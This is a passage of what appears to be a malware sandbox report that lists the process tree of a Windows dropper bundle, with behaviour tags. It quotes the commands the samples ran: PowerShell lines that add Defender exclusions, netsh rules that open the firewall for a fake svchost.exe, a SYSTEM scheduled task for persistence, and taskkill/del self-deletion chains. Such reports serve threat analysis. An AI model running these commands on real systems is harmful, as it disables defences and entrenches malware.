                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\AgMfDFhPmlwuzGNvuGWYu4fd.exe"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3124
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\sbdve7DnEFNjEsfCesCK17fs.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\sbdve7DnEFNjEsfCesCK17fs.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4460
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\sbdve7DnEFNjEsfCesCK17fs.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\sbdve7DnEFNjEsfCesCK17fs.exe"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:4464
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 1732
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:6284
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\osUirLYjcJKtDE2yoYHvqk5g.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\osUirLYjcJKtDE2yoYHvqk5g.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2348
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im osUirLYjcJKtDE2yoYHvqk5g.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\osUirLYjcJKtDE2yoYHvqk5g.exe" & del C:\ProgramData\*.dll & exit
                                                                                                          7⤵
                                                                                                            PID:2188
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /im osUirLYjcJKtDE2yoYHvqk5g.exe /f
                                                                                                              8⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6252
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout /t 6
                                                                                                              8⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:5440
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\i6nxtyx7BarQ24Vl3LAtza8m.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\i6nxtyx7BarQ24Vl3LAtza8m.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:4536
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\h9bnUDfFMeIt8rneW0aACC8Q.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\h9bnUDfFMeIt8rneW0aACC8Q.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4616
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                            7⤵
                                                                                                              PID:4744
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im chrome.exe
                                                                                                                8⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:6444
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\4nGp54LQDCXYW5khH1VOZaAg.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\4nGp54LQDCXYW5khH1VOZaAg.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:4624
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\rUst0DETcHIvIGaU319_LpH_.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\rUst0DETcHIvIGaU319_LpH_.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:4580
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\cEPke2zT8sr1uWuvmsg4MSdc.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\cEPke2zT8sr1uWuvmsg4MSdc.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:1384
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\H1ieIgAySYLMv2OveLIcmZB7.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\H1ieIgAySYLMv2OveLIcmZB7.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1644
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\e0fb6562-1cf0-4bc4-af39-f03f75469bf6\AdvancedRun.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\e0fb6562-1cf0-4bc4-af39-f03f75469bf6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e0fb6562-1cf0-4bc4-af39-f03f75469bf6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                              7⤵
                                                                                                                PID:6432
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\e0fb6562-1cf0-4bc4-af39-f03f75469bf6\AdvancedRun.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\e0fb6562-1cf0-4bc4-af39-f03f75469bf6\AdvancedRun.exe" /SpecialRun 4101d8 6432
                                                                                                                  8⤵
                                                                                                                    PID:6792
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\H1ieIgAySYLMv2OveLIcmZB7.exe" -Force
                                                                                                                  7⤵
                                                                                                                    PID:6260
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\H1ieIgAySYLMv2OveLIcmZB7.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\H1ieIgAySYLMv2OveLIcmZB7.exe"
                                                                                                                    7⤵
                                                                                                                      PID:6148
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\H1ieIgAySYLMv2OveLIcmZB7.exe" -Force
                                                                                                                      7⤵
                                                                                                                        PID:6312
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\7dKeR3QYINgKhjWeYA98EgTx.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\7dKeR3QYINgKhjWeYA98EgTx.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5040
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\uT7sjAMms_vpoq2_PZlaqh4U.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\uT7sjAMms_vpoq2_PZlaqh4U.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4776
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\IGIR4lWb7zEqHZeeibaHmFVB.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\IGIR4lWb7zEqHZeeibaHmFVB.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4656
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\QBSKveyBMRVmLnu44riuIHwO.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\QBSKveyBMRVmLnu44riuIHwO.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5552
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MjpFiZVjH.exe"
                                                                                                                        7⤵
                                                                                                                          PID:4524
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                            8⤵
                                                                                                                              PID:2504
                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                              8⤵
                                                                                                                                PID:4968
                                                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                8⤵
                                                                                                                                  PID:7216
                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                  schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                  8⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:7252
                                                                                                                                • C:\Windows\System\svchost.exe
                                                                                                                                  "C:\Windows\System\svchost.exe" formal
                                                                                                                                  8⤵
                                                                                                                                    PID:7704
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                      9⤵
                                                                                                                                        PID:7744
                                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                        9⤵
                                                                                                                                          PID:2144
                                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                          9⤵
                                                                                                                                            PID:1744
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\a0sJR4vlDVweDCTR0TimuSWB.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\a0sJR4vlDVweDCTR0TimuSWB.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:2156
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                        7⤵
                                                                                                                                          PID:7208
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--DzBsjyZ8js"
                                                                                                                                            8⤵
                                                                                                                                              PID:5500
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1d4,0x204,0x7ffa011bdec0,0x7ffa011bded0,0x7ffa011bdee0
                                                                                                                                                9⤵
                                                                                                                                                  PID:6448
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --mojo-platform-channel-handle=1736 /prefetch:8
                                                                                                                                                  9⤵
                                                                                                                                                    PID:6088
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1688 /prefetch:2
                                                                                                                                                    9⤵
                                                                                                                                                      PID:7868
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2476 /prefetch:1
                                                                                                                                                      9⤵
                                                                                                                                                        PID:1980
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2448 /prefetch:1
                                                                                                                                                        9⤵
                                                                                                                                                          PID:7204
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --mojo-platform-channel-handle=2160 /prefetch:8
                                                                                                                                                          9⤵
                                                                                                                                                            PID:684
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --mojo-platform-channel-handle=3112 /prefetch:8
                                                                                                                                                            9⤵
                                                                                                                                                              PID:2672
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3236 /prefetch:2
                                                                                                                                                              9⤵
                                                                                                                                                                PID:4764
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --mojo-platform-channel-handle=3444 /prefetch:8
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:7496
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --mojo-platform-channel-handle=3456 /prefetch:8
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:6252
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --mojo-platform-channel-handle=1884 /prefetch:8
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:7464
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,236245934778738336,6728453736719953613,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5500_2122034450" --mojo-platform-channel-handle=2044 /prefetch:8
                                                                                                                                                                      9⤵
                                                                                                                                                                        PID:6064
                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\4H_niNRgSUOchA9cQd3zCrvN.exe
                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\4H_niNRgSUOchA9cQd3zCrvN.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:4388
                                                                                                                                                                  • C:\ProgramData\RI0Y2U4INK024NPZ.exe
                                                                                                                                                                    "C:\ProgramData\RI0Y2U4INK024NPZ.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:2832
                                                                                                                                                                      • C:\Windows\System32\conhost.exe
                                                                                                                                                                        "C:\Windows\System32\conhost.exe" "C:\ProgramData\RI0Y2U4INK024NPZ.exe"
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:4240
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 4H_niNRgSUOchA9cQd3zCrvN.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4H_niNRgSUOchA9cQd3zCrvN.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5496
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /im 4H_niNRgSUOchA9cQd3zCrvN.exe /f
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:7092
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout /t 6
                                                                                                                                                                            8⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:6792
                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\xqIXjE9J1pbWB0ruUX4SS79t.exe
                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\xqIXjE9J1pbWB0ruUX4SS79t.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5488
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1044
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon20b6f9d5bd03a305.exe
                                                                                                                                                                        Mon20b6f9d5bd03a305.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:2212
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:2968
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS89CDE644\Mon209b3da1556b9a317.exe
                                                                                                                                                                          Mon209b3da1556b9a317.exe
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:2160
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:4064
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:3832
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:1456
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5779736.scr
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5779736.scr" /S
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:4648
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1740738.scr
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\1740738.scr" /S
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:4820
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6740724.scr
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6740724.scr" /S
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:3760
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5316849.scr
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5316849.scr" /S
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:5060
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\5858501.scr
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\5858501.scr" /S
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                PID:5520
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6949064.scr
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6949064.scr" /S
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:5628
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:3740
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 1628
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                • Program crash
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:5044
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:704
                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 704 -s 1512
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Program crash
                                                                                                                                                                                PID:4996
                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 704 -s 1512
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Program crash
                                                                                                                                                                                PID:3920
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:4112
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-M8QDP.tmp\setup.tmp
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-M8QDP.tmp\setup.tmp" /SL5="$10206,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                8⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                PID:4896
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4320
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-DNASS.tmp\setup.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-DNASS.tmp\setup.tmp" /SL5="$20208,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                                                    10⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:5108
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2NKCE.tmp\postback.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2NKCE.tmp\postback.exe" ss1
